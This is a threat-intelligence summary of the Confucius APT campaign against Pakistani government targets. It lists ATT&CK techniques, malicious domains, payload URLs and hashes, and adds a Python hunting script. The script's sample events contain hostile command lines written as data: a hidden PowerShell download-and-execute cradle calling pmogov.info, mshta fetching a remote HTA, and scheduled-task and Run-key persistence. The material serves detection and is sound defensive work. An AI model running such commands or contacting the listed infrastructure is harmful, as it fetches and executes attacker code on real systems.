Confucius, an Indian APT group, has targeted Pakistan’s government and military since 2021 using spearphishing attachments and counterfeit government portals to deliver multi-stage loaders. The operation leverages QuasarRAT and bespoke C++/C# backdoors, delivered via Office macros and various downloaders, while relying on Dropbox storage, Branch deep links, and Cloudflare to hide infrastructure and complicate analysis. #Confucius #QuasarRAT #BranchIO #Dropbox #SideWinder #DeMnu #Pakistan
Keypoints
- Confucius has conducted sustained attacks against Pakistan’s government and military, beginning in 2021, using spearphishing emails and lure documents tied to government-related topics.
- Initial access is achieved with malicious Word/Excel macros that drop a multi-stage loader chain (Stage 1–Stage 4) including QuasarRAT, self-developed backdoors, and JScript/VBScript downloaders.
- Attackers cloak operations via cloud storage (Dropbox), deep links (Branch), and Cloudflare to obscure origin and restrict access by geography, and password-protect the macro documents (passwords delivered in the email body, a PDF, or the phishing page) to hinder analysis.
- Persistence and execution leverage Windows Task Scheduler, registry Run keys, PowerShell, CMD, Mshta, and JScript/VBScript for staged payload deployment and execution.
- The malware family includes both open-source components (QuasarRAT) and custom loaders/backdoors (C#, C++), with extensive data collection, credential theft, and file exfiltration features.
- Attribution links Confucius activity to SideWinder through overlapping LNK artifacts and shared infrastructure; DeMnu obfuscator artifacts also appear in some samples.
- Pakistan's NTISB and other government advisories have warned about phishing campaigns impersonating the PMO and cautioned public officials against disclosing information.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – "Posing as Pakistani government staff, the attackers deliver spearphishing emails to targets … [who] download and open documents embedded with malicious macro code."
- [T1059.001] Command and Scripting Interpreter: PowerShell – "Malicious payloads are loaded through the system tool PowerShell."
- [T1059.005] Command and Scripting Interpreter: Visual Basic – VBScript is used in the downloaders and for payload delivery.
- [T1059.007] Command and Scripting Interpreter: JavaScript – "The JScript downloader trojan … executes commands according to the browser engine information" (the next-stage payload is selected based on the browser engine detected).
- [T1218.005] System Binary Proxy Execution: Mshta – "Remote HTA scripts are executed via MSHTA."
- [T1027] Obfuscated Files or Information – "The malicious macro documents are encrypted … the password is placed in the email body, the PDF body, and the phishing website page" (password-protected macro documents).
- [T1105] Ingress Tool Transfer – "Download the malicious payload … download the document containing the malicious macro" (payloads fetched from attacker-controlled links).
- [T1567.002] Exfiltration to Cloud Storage – "Malicious payloads are stored on third-party cloud storage services such as Dropbox." Note that the quoted behaviour is payload staging rather than data exfiltration; T1102 (Web Service) is the closer mapping for hosting stages on Dropbox.
- [T1090] Proxy – "The Cloudflare CDN acceleration service … hides the domain's real IP address."
- [T1071.001] Application Layer Protocol: Web Protocols – "C2 uses application-layer protocols such as HTTP/HTTPS."
- [T1053.005] Scheduled Task/Job: Scheduled Task – "Scheduled tasks are created … to persistently execute the C# information-stealing trojan and the C++ backdoor trojan."
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – "Registry Run keys are used to execute the C++ backdoor trojan."
- [T1012] Query Registry – "Retrieves registry information."
- [T1083] File and Directory Discovery – "Retrieves disk drive information and searches for files matching given criteria."
- [T1135] Network Share Discovery – "Enumerates network shares."
Indicators of Compromise
- [MD5] – Malicious documents/backdoors – 41CDCEC8311F735E1ED8D3BAB9192173, 06B5A67BF37FED5B92C2211F342D7F0A
- [Domain] – Malicious infrastructure domains – pmogov.info, pmogov.online, ndu-edu.digital, psca-gop-pk.digital
- [URL] – Malicious links used to host/load payloads – http://185.203.*.42/uphta/z.vbs, http://classcentral-*.ddns.net/TNC/Class_Central.zip
- [File] – Suspected weaponized documents – SRIU-AppForm.docm, FBR5323-Notice.xlsm
- [LNK] – Malicious shortcut – WhatsApp.jpeg.lnk
- [Disk Identifier] – Drive/volume fingerprint used in samples – 29ebe0d2-885f-4b6f-9277-80f9904dafe4
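The following is an added hunting example, not code from the original report or from the Confucius toolset. It scores process-creation events against the execution and persistence techniques in the MITRE list above (Mshta fetching a remote HTA, script hosts running VBScript/JScript, PowerShell download cradles, schtasks creation, Run-key writes) and against the domain IoCs listed above. The events are constructed to resemble Sysmon Event ID 1 fields (Image, CommandLine); the file names, task name and the placeholder address 192.0.2.10 are invented for illustration, and only the four domains come from the IoC list.

```python
"""Hunting helper (added example): map process-creation events to the ATT&CK
techniques and domain IoCs from the Confucius write-up. Log lines are constructed."""
import re

# Domain IoCs taken from the report; everything else in this file is constructed.
IOC_DOMAINS = {"pmogov.info", "pmogov.online", "ndu-edu.digital", "psca-gop-pk.digital"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\b", re.I)
PS_CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|-enc(?:odedcommand)?\b|frombase64string")


def analyze_event(image: str, command_line: str) -> list[str]:
    """Return technique IDs (and IOC:<domain> tags) whose signs appear in one event."""
    hits = []
    exe = image.rsplit("\\", 1)[-1].lower()
    cmd = command_line.lower()
    # T1218.005: mshta.exe given an http(s) URL pulls the HTA from the network.
    if exe == "mshta.exe" and URL_RE.search(command_line):
        hits.append("T1218.005")
    # T1059.005 / T1059.007: Windows Script Host executing .vbs/.vbe or .js/.jse droppers.
    if exe in ("wscript.exe", "cscript.exe"):
        if re.search(r"\.vbs\b|\.vbe\b", cmd):
            hits.append("T1059.005")
        if re.search(r"\.js\b|\.jse\b", cmd):
            hits.append("T1059.007")
    # T1059.001: PowerShell used as a loader (download cradle or encoded command).
    if exe in ("powershell.exe", "pwsh.exe") and PS_CRADLE_RE.search(cmd):
        hits.append("T1059.001")
    # T1053.005: scheduled task created from the command line.
    if exe == "schtasks.exe" and "/create" in cmd:
        hits.append("T1053.005")
    # T1547.001: reg.exe writing an HKCU/HKLM Run or RunOnce value.
    if exe == "reg.exe" and " add " in f" {cmd} " and RUN_KEY_RE.search(command_line):
        hits.append("T1547.001")
    # Any URL in the command line whose host is a known-bad domain from the report.
    for host in URL_RE.findall(command_line):
        if host.lower() in IOC_DOMAINS:
            hits.append(f"IOC:{host.lower()}")
    return hits


# Constructed Sysmon-EID-1-like events: (Image, CommandLine). Not real telemetry.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\mshta.exe",
     "mshta.exe http://192.0.2.10/uphta/run.hta"),
    ("C:\\Windows\\System32\\wscript.exe",
     "wscript.exe //B C:\\Users\\u\\AppData\\Local\\Temp\\z.vbs"),
    ("C:\\Windows\\System32\\schtasks.exe",
     "schtasks.exe /Create /SC MINUTE /MO 30 /TN OfficeUpdate /TR C:\\Users\\Public\\svc.exe /F"),
    ("C:\\Windows\\System32\\reg.exe",
     "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater "
     "/t REG_SZ /d C:\\Users\\Public\\svc.exe /f"),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('https://pmogov.info/x.ps1')\""),
    ("C:\\Windows\\System32\\notepad.exe",
     "notepad.exe C:\\Users\\u\\Documents\\notes.txt"),
]


def hunt(events):
    """Run analyze_event over (image, command_line) pairs; keep only events with findings."""
    findings = []
    for image, cmd in events:
        hits = analyze_event(image, cmd)
        if hits:
            findings.append((image, cmd, hits))
    return findings


if __name__ == "__main__":
    for _image, cmd, hits in hunt(SAMPLE_EVENTS):
        print(f"{', '.join(hits):32} {cmd}")
```

The checks are deliberately narrow (exact image names, explicit URL in the mshta command line, `/create` for schtasks) so they can be dropped into an existing pipeline without flooding analysts; widen them per environment once baseline noise from legitimate script hosts and scheduled-task installers is understood.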
Read more: https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ